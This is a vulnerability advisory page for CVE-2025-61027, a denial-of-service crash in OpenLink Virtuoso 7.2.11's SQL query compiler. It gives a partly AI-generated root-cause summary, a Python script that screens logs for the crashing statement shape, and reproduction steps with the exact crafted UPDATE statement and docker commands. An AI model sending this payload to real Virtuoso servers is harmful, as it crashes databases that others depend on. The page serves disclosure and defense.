CVE-2025-61027
Description
An issue in the t_set_push component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Range: =7.2.11
Patches
Vulnerability mechanics
Root cause
"Missing input validation in the `t_set_push` function during SQL query compilation causes a segmentation fault when processing a crafted `UPDATE` statement with an aggregate function in a subquery."
Attack vector
An attacker can cause a denial of service by sending a specially crafted SQL `UPDATE` statement that includes a correlated subquery with an aggregate function (`SUM`) inside an `IN` clause. The statement does not require authentication beyond a valid database connection. The PoC provided in [ref_id=1] demonstrates the exact payload that triggers a crash in `t_set_push` during query compilation.
Affected code
The crash occurs in `t_set_push` (frame #0) during query compilation, triggered by a crafted `UPDATE` statement with a correlated subquery that uses `SUM` inside an `IN` clause. The backtrace shows the fault propagates through `sqlo_fun_ref_epilogue`, `sqlo_layout_1`, `sqlo_layout`, and ultimately `sqlc_update_searched`, confirming the vulnerability lies in the SQL query compiler's handling of aggregate expressions in subqueries.
What the fix does
The advisory [ref_id=1] does not include a patch or fix. The vendor has not yet published a remediation. Based on the crash location in `t_set_push`, a fix would likely need to add a null-pointer or bounds check when the query compiler processes aggregate expressions inside subqueries used in `IN` clauses, preventing the segmentation fault.
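With no patch published, statements of the shape described above can be screened in query logs or at a SQL proxy before they reach the query compiler. The following is an added example, not code from the advisory or the Virtuoso project: the function names are hypothetical, screening aggregates other than `SUM` is an assumption, and the sample log is constructed around the statement in the Reproduction section.

```python
import re

# Assumption: the advisory names only SUM; the other aggregates are screened as a precaution.
AGGREGATES = {"SUM", "COUNT", "AVG", "MIN", "MAX"}
# String literals are matched first so SQL-looking text inside quotes is never parsed.
TOKEN = re.compile(r"'(?:[^']|'')*'|[A-Za-z_][A-Za-z0-9_]*|[();]")

def split_statements(sql):
    """Tokenize and split on ';'. Words are upper-cased, literals become 'STR'."""
    stmt, out = [], []
    for tok in TOKEN.findall(sql):
        if tok == ";":
            out.append(stmt)
            stmt = []
        else:
            stmt.append("STR" if tok[0] == "'" else tok.upper())
    return out + ([stmt] if stmt else [])

def subquery_has_aggregate(toks, start):
    """Scan from the SELECT at toks[start] to the parenthesis closing the subquery."""
    depth = 0
    for i in range(start, len(toks)):
        if toks[i] == "(":
            depth += 1
        elif toks[i] == ")":
            depth -= 1
            if depth < 0:          # left the IN ( ... ) subquery
                return False
        elif toks[i] in AGGREGATES and toks[i + 1:i + 2] == ["("]:
            return True
    return False

def flag_updates(sql):
    """Return 0-based indexes of UPDATE statements whose IN-subquery calls an aggregate."""
    flagged = []
    for n, toks in enumerate(split_statements(sql)):
        if toks[:1] != ["UPDATE"]:
            continue
        for i in range(len(toks) - 2):
            if toks[i:i + 3] == ["IN", "(", "SELECT"] and subquery_has_aggregate(toks, i + 2):
                flagged.append(n)
                break
    return flagged

# Constructed sample log; statement 1 is the UPDATE from this page's Reproduction section.
SAMPLE_LOG = """
CREATE TABLE v0 ( v1 DATE NULL ) ;
UPDATE v0 SET v1 = v1 + 2 WHERE v1 IN ( SELECT v1 , SUM ( v1 ) AS zero_value FROM v0 AS negative_value CROSS JOIN v0 ON ( '$.datetime(HH24:MI:SS).type()' ) ) ;
UPDATE orders SET total = 0 WHERE id IN (SELECT id FROM orders WHERE qty > 1);
UPDATE t SET a = (SELECT MAX(b) FROM u) WHERE id IN (SELECT id FROM u);
UPDATE t SET note = 'x IN (SELECT SUM(y))' WHERE id = 1;
"""

if __name__ == "__main__":
    print(flag_updates(SAMPLE_LOG))
```

The screen is deliberately conservative: it flags legitimate `UPDATE ... IN (SELECT ... HAVING COUNT(...))` statements too, so it suits alerting or review queues better than silent blocking.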
Preconditions
- network: Attacker must have network access to a running Virtuoso instance (default port 1111)
- auth: Attacker must be able to execute arbitrary SQL statements (e.g., via isql)
Reproduction
1. Start a Virtuoso 7.2.11 container: `docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7`
2. Wait 10 seconds for the server to start.
3. Write the PoC to `/tmp/test.sql`:

```
CREATE TABLE v0 ( v1 DATE NULL ) ;
UPDATE v0 SET v1 = v1 + 2 WHERE v1 IN ( SELECT v1 , SUM ( v1 ) AS zero_value FROM v0 AS negative_value CROSS JOIN v0 ON ( '$.datetime(HH24:MI:SS).type()' ) ) ;
```

4. Execute: `cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba`
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References